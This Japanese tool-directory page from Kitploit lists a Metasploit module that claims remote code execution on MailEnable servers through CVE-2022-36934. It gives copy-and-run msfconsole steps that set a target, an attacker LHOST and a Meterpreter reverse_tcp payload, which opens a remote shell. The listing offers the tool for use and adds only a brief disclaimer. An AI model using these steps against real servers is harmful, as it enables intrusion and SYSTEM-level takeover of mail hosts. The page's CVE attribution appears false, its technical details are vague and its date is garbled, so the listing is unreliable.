Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
mailenable-cve-2022-36934 — MailEnable CVE-2022-36934 認証バイパス RCE 用 Metasploit モジュール | Kitploit
ツール/GitHubGitHub/tdawg506/mailenable-cve-2022-36934
エクスプロイトフレームワーク脆弱性分析ウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールペイロード開発
GitHubtdawg506/mailenable-cve-2022-36934

mailenable-cve-2022-36934

MailEnable CVE-2022-36934 認証バイパス RCE 用 Metasploit モジュール

リポジトリを見る
51年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

MailEnable CVE-2022-36934 エクスプロイトモジュール

Metasploit License

MailEnableの認証バイパス脆弱性(CVE-2022-36934)を突き、リモートコード実行に至らせるMetasploitモジュールです。

📌 特徴

  • SMTP/POP3におけるMailEnableの不適切な入力サニタイズを悪用します
  • x86およびx64のWindowsターゲットをサポート
  • ユーザーの操作は不要(細工されたメールで自動トリガー)
  • MailEnable バージョン < 10.40 に対して動作します

🚀 インストール

  1. Metasploitモジュールディレクトリにコピーします:
    root@kitploit:~
    cp modules/exploits/windows/smtp/mailenable_authbypass_rce.rb /usr/share/metasploit-framework/modules/exploits/windows/smtp/
    
    
  2. msfconsoleでモジュールをリロードします:

reload_all

  1. 使用方法:

use exploit/windows/smtp/mailenable_authbypass_rce set RHOSTS <target_ip> set LHOST <your_ip> set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit

🎯 テスト済み環境:

MailEnable Professional 10.25 Windows Server 2019 MailEnable Enterprise 10.30 Windows Server 2016

📝 技術詳細:

Vulnerability: SMTP/POP3におけるSQLi類似構文による認証バイパス

Attack Vector: ネットワーク(ポート25/110)

Privileges: MailEnableサービスアカウントとして実行(多くの場合SYSTEM)

⚠️ 法的免責事項:

このツールは認可されたテスト専用です。所有していない、または明示的なテスト許可がないシステムに対しては絶対に使用しないでください。

ツールをダウンロード